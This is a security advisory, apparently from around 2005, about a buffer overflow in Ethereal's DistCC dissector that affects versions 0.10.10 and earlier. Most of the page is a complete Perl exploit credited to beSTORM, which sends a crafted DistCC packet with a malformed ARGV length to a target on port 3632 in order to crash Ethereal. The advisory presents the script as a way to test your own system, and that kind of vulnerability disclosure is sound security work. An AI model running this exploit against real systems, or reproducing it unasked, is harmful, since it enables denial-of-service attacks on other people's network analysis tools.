Ethereal DistCC Buffer Overflow (Exploit)
Summary
As we reported in our previous article: Ethereal DistCC Dissector Overflow, a vulnerability in Ethereal's DistCC dissector allows attackers to cause Ethereal to crash by overflowing an internal buffer used by Ethereal when it tries to handle DistCC related packets. The following exploit code can be used to test your system for the mentioned vulnerability.
Credit:
The information has been provided by beSTORM.
Details
Vulnerable Systems:
* Ethereal version 0.10.10 and prior
Immune Systems:
* Ethereal version 0.10.11 or newer
Exploit:
#!/usr/bin/perl -w
# Exploit generated by beSTORM on 2005-05-10 12:45
# All Rights Reserved - Copyright (tm)
use IO::Socket;
use strict;
my $target = shift;
my $print_usage = 0;
if (!$target)
{
usage();
print "No target has been supplied, reverting to 192.168.1.52.\n";
$target = "192.168.1.52";
}
print "Will attack $target.\n";
my $target_port = 3632;
my $packet =<<END;
DIST00000001ARGC00000008ARGVFFFFFF00ccARGV00000002-gARGV00000003-O2ARGV00000005-WallARGV00000002-cARGV00000006main.cARGV00000002-oARGV00000006main.oDOTI0000001Bint main()\n{\n return(0);\n}\n
END
print "Sending: [$packet]\n";
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $target, PeerPort => "3632");
unless ($remote) { die "cannot connect to distcc daemon on $target" }
print $remote $packet;
print "Done.\n";
sub usage
{
if ($print_usage) { return; }
$print_usage = 1;
print ("#"x50);
print "\n";
print "# $0 [hostname]\n";
print "# hostname\t-\tThe host the packet will be sent to.\n";
print "\n";
}
推荐
评论(0条)
